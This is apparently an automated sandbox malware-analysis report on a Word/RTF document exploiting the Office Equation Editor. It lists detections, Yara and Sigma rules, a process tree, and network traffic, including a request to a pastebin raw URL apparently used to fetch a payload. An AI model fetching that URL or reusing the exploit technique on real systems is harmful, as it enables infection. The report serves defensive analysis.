Edit tour

Windows Analysis Report
test.doc

Overview

General Information

Sample name:	test.doc
Analysis ID:	1532551
MD5:	f5fc224eb5cbbff8ee4bf4670ed9611a
SHA1:	8e3f85dd6fb94da77990987bd26bde7e59042490
SHA256:	80f7f23bea03b2386ae91e156835c2a685d9515e0c42f4dd89f782d64a29f701
Tags:	docuser-ikoora
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Connects to a pastebin service (likely for C&C)

Document exploit detected (process start blacklist hit)

Installs new ROOT certificates

Office equation editor establishes network connection

Sigma detected: Equation Editor Network Connection

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Stores large binary data to the registry

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 3284 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 3368 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

taskmgr.exe (PID: 3624 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

mmc.exe (PID: 4028 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 2664 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 2124 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 3068 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 2996 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 3448 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 3508 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 1996 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 3588 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 2316 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 3576 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 1860 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 3464 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 3784 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 3872 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

mmc.exe (PID: 4060 cmdline: "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" MD5: 9FEA051A9585F2A303D55745B4BF63AA)

taskmgr.exe (PID: 2464 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 924 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 728 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 2936 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 3316 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 2628 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 1912 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 956 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 2464 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 1692 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 3328 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 2628 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 3660 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 3812 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 4008 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

taskmgr.exe (PID: 3308 cmdline: "C:\Windows\system32\taskmgr.exe" MD5: 09F7401D56F2393C6CA534FF0241A590)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
test.doc	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x7b:$obj2: \objdata 0x868:$obj3: \objupdate

Sigma Signatures

System Summary

Sigma detected: Equation Editor Network Connection

Source: Network Connection

Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 104.20.4.235, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3368, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3368, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3284, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Suricata Signatures

ET MALWARE Unknown VBScript Loader with Encoded PowerShell Execution Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T17:15:09.259053+0200	2027374	1	A Network Trojan was detected	104.20.4.235	443	192.168.2.22	49161	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: test.doc

Avira: detected

Multi AV Scanner detection for submitted file

Source: test.doc	ReversingLabs: Detection: 64%
Source: test.doc	Virustotal: Detection: 56%			Perma Link

Exploits

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.20.4.235 Port: 443

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.22:49161 version: TLS 1.2

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Source: global traffic

DNS query: name: pastebin.com

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443

Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 104.20.4.235:443
Source: global traffic	TCP traffic: 104.20.4.235:443 -> 192.168.2.22:49161

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2027374 - Severity 1 - ET MALWARE Unknown VBScript Loader with Encoded PowerShell Execution Inbound : 104.20.4.235:443 -> 192.168.2.22:49161

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic

HTTP traffic detected: GET /raw/JtdAmHD5 HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pastebin.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B78A2EBB-134B-4F32-AD23-E4D3EAD5CCE0}.tmp

Jump to behavior

Source: global traffic

Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic

DNS traffic detected: DNS query: pastebin.com

Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.000000000097D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/
Source: EQNEDT32.EXE, 00000002.00000003.359634112.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/JtdAmHD5
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/JtdAmHD5...
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/JtdAmHD5...mpoq
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/JtdAmHD556z
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/JtdAmHD5598B1687
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/JtdAmHD5:
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/JtdAmHD5Py
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.0000000000914000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/JtdAmHD5dy
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000008F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/JtdAmHD5ed
Source: EQNEDT32.EXE, 00000002.00000002.1530889300.00000000009C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161

Source: unknown

HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.22:49161 version: TLS 1.2

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\System32\mmc.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: test.doc, type: SAMPLE

Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Memory allocated: 770B0000 page execute and read and write

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: test.doc, type: SAMPLE

Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: classification engine

Classification label: mal92.troj.expl.winDOC@103/6@1/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$test.doc

Jump to behavior

Source: C:\Windows\System32\taskmgr.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\TASKMGR.879e4d63-6c0e-4544-97f2-1244bd3f6de0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR86CB.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: test.doc	ReversingLabs: Detection: 64%
Source: test.doc	Virustotal: Detection: 56%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Windows\System32\taskmgr.exe	Process created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"	Jump to behavior
